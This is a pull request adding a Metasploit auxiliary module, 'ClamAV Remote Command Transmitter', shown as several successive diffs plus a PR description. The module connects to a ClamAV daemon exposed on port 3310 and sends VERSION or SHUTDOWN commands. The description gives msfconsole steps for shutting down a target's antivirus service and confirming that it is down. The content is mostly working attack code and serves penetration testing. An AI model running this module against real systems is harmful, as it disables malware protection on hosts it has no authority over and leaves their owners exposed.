### PR TITLE
Add ClamAV Remote Command Transmitter

### DIFF
--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'License'        => MSF_LICENSE,
         'References'     => [
-          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ]
+          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
           [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
           ],
         'DisclosureDate' => 'Jun 8 2016',

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
         'References'     => [
           [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
           [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
-          ],
+        ],
         'DisclosureDate' => 'Jun 8 2016',
         'Actions'        => [
           [ 'VERSION',  'Description' => 'Get Version Information' ],
@@ -36,19 +36,26 @@ class MetasploitModule < Msf::Auxiliary
         'DefaultAction'  => 'VERSION'
       )
     )
-    register_options([
-      Opt::RPORT(3310)
-    ], self.class)
+    register_options(
+      [
+        Opt::RPORT(3310)
+      ], self.class
+    )
   end
 
-  def run_host(ip)
+  def run_host(_ip)
     begin
       connect
       sock.put(action.name + "\n")
       print_good(sock.get_once)
-    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
+    rescue Rex::ConnectionRefused
+      ilog("Connection Refused")
+    rescue Rex::ConnectionTimeout
+      ilog("Connection Timeout")
+    rescue Rex::HostUnreachable
+      ilog("Host Unreachable")
     rescue EOFError
-      print_bad('Successfully shut down ClamAV Service')
+      print_good('Successfully shut down ClamAV Service')
     ensure
       disconnect
     end

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -42,9 +42,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    register_options([
-      Opt::RHOST(ip)
-    ], self.class)
     begin
       connect
       sock.put(action.name + "\n")

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ClamAV Remote Command Transmitter',
+      'Description'    => %q{
+        In certain configurations, ClamAV will bind to all addresses and listen for commands.
+        This module sends properly-formatted commands to the ClamAV daemon if it is in such a
+        configuration.
+      },
+      'Author'         => [
+        'Alejandro Hdeza', #DISCOVER
+        'bwatters-r7',     #MODULE
+        'wvu'              #GUIDANCE
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ]
+        ],
+      'DisclosureDate' => 'Jun 8 2016',
+      'Actions'        => [
+        [ 'VERSION',  'Description' => 'Get Version Information' ],
+        [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
+      ],
+      'DefaultAction'  => 'VERSION'
+    ))
+    register_options([
+      Opt::RPORT(3310)
+    ], self.class)
+  end
+
+  def run
+    begin
+      connect
+      sock.put(action.name + "\n")
+      print_good(sock.get_once)
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    rescue EOFError
+      print_error('Successfully shut down ClamAV Service')
+    ensure
+      disconnect
+    end
+
+  end
+end

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -7,6 +7,7 @@ require 'msf/core'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
   def initialize(info = {})
     super(
       update_info(
@@ -40,15 +41,17 @@ class MetasploitModule < Msf::Auxiliary
     ], self.class)
   end
 
-  def run
+  def run_host(ip)
+    register_options([
+      Opt::RHOST(ip)
+    ], self.class)
     begin
       connect
       sock.put(action.name + "\n")
       print_good(sock.get_once)
-    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
-      fail_with(Failure::Unreachable, e)
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
     rescue EOFError
-      print_good('Successfully shut down ClamAV Service')
+      print_bad('Successfully shut down ClamAV Service')
     ensure
       disconnect
     end

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -5,35 +5,35 @@
 
 require 'msf/core'
 
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
-
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ClamAV Remote Command Transmitter',
-      'Description'    => %q{
-        In certain configurations, ClamAV will bind to all addresses and listen for commands.
-        This module sends properly-formatted commands to the ClamAV daemon if it is in such a
-        configuration.
-      },
-      'Author'         => [
-        'Alejandro Hdeza', #DISCOVER
-        'bwatters-r7',     #MODULE
-        'wvu'              #GUIDANCE
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ]
+    super(
+      update_info(
+        info,
+        'Name'           => 'ClamAV Remote Command Transmitter',
+        'Description'    => %q(
+          In certain configurations, ClamAV will bind to all addresses and listen for commands.
+          This module sends properly-formatted commands to the ClamAV daemon if it is in such a
+          configuration.
+        ),
+        'Author'         => [
+          'Alejandro Hdeza', # DISCOVER
+          'bwatters-r7',     # MODULE
+          'wvu'              # GUIDANCE
         ],
-      'DisclosureDate' => 'Jun 8 2016',
-      'Actions'        => [
-        [ 'VERSION',  'Description' => 'Get Version Information' ],
-        [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
-      ],
-      'DefaultAction'  => 'VERSION'
-    ))
+        'License'        => MSF_LICENSE,
+        'References'     => [
+          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ]
+          ],
+        'DisclosureDate' => 'Jun 8 2016',
+        'Actions'        => [
+          [ 'VERSION',  'Description' => 'Get Version Information' ],
+          [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
+        ],
+        'DefaultAction'  => 'VERSION'
+      )
+    )
     register_options([
       Opt::RPORT(3310)
     ], self.class)
@@ -51,6 +51,5 @@ class MetasploitModule < Msf::Auxiliary
     ensure
       disconnect
     end
-
   end
 end

--- a/modules/auxiliary/admin/misc/clamav_control.rb
+++ b/modules/auxiliary/admin/misc/clamav_control.rb
@@ -25,6 +25,7 @@ class MetasploitModule < Msf::Auxiliary
         'License'        => MSF_LICENSE,
         'References'     => [
           [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ]
+          [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
           ],
         'DisclosureDate' => 'Jun 8 2016',
         'Actions'        => [
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
       fail_with(Failure::Unreachable, e)
     rescue EOFError
-      print_error('Successfully shut down ClamAV Service')
+      print_good('Successfully shut down ClamAV Service')
     ensure
       disconnect
     end

--- a/modules/auxiliary/scanner/misc/clamav_control.rb
+++ b/modules/auxiliary/scanner/misc/clamav_control.rb
@@ -48,12 +48,6 @@ class MetasploitModule < Msf::Auxiliary
       connect
       sock.put(action.name + "\n")
       print_good(sock.get_once)
-#    rescue Rex::ConnectionRefused
-#      ilog("Connection Refused")
-#    rescue Rex::ConnectionTimeout
-#      ilog("Connection Timeout")
-#    rescue Rex::HostUnreachable
-#      ilog("Host Unreachable")
     rescue EOFError
       print_good('Successfully shut down ClamAV Service')
     ensure

--- a/modules/auxiliary/scanner/misc/clamav_control.rb
+++ b/modules/auxiliary/scanner/misc/clamav_control.rb
@@ -48,12 +48,12 @@ class MetasploitModule < Msf::Auxiliary
       connect
       sock.put(action.name + "\n")
       print_good(sock.get_once)
-    rescue Rex::ConnectionRefused
-      ilog("Connection Refused")
-    rescue Rex::ConnectionTimeout
-      ilog("Connection Timeout")
-    rescue Rex::HostUnreachable
-      ilog("Host Unreachable")
+#    rescue Rex::ConnectionRefused
+#      ilog("Connection Refused")
+#    rescue Rex::ConnectionTimeout
+#      ilog("Connection Timeout")
+#    rescue Rex::HostUnreachable
+#      ilog("Host Unreachable")
     rescue EOFError
       print_good('Successfully shut down ClamAV Service')
     ensure


### PR DESCRIPTION
# What This Module Does

This module takes advantage of a possible misconfiguration in the ClamAV service on release 0.99.2.  If the service is tied to a socket, the ClamAV service listens for commands on all addresses; this module connects to the ClamAV service port and sends the proper commands for VERSION and SHUTDOWN.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use auxiliary/admin/misc/clamav_control`
- [x] `set rhost xxx.xxx.xxx.xxx`
- [x] `set action VERSION`
- [x] `run`
- [x] **Verify** It returns the correct version
- [x] `set action SHUTDOWN`
- [x] `run`
- [x] **Verify** It shuts down the service
- [x] `set action VERSION`
- [x] `run`
- [x] **Verify** It does not return a version (Should timeout)
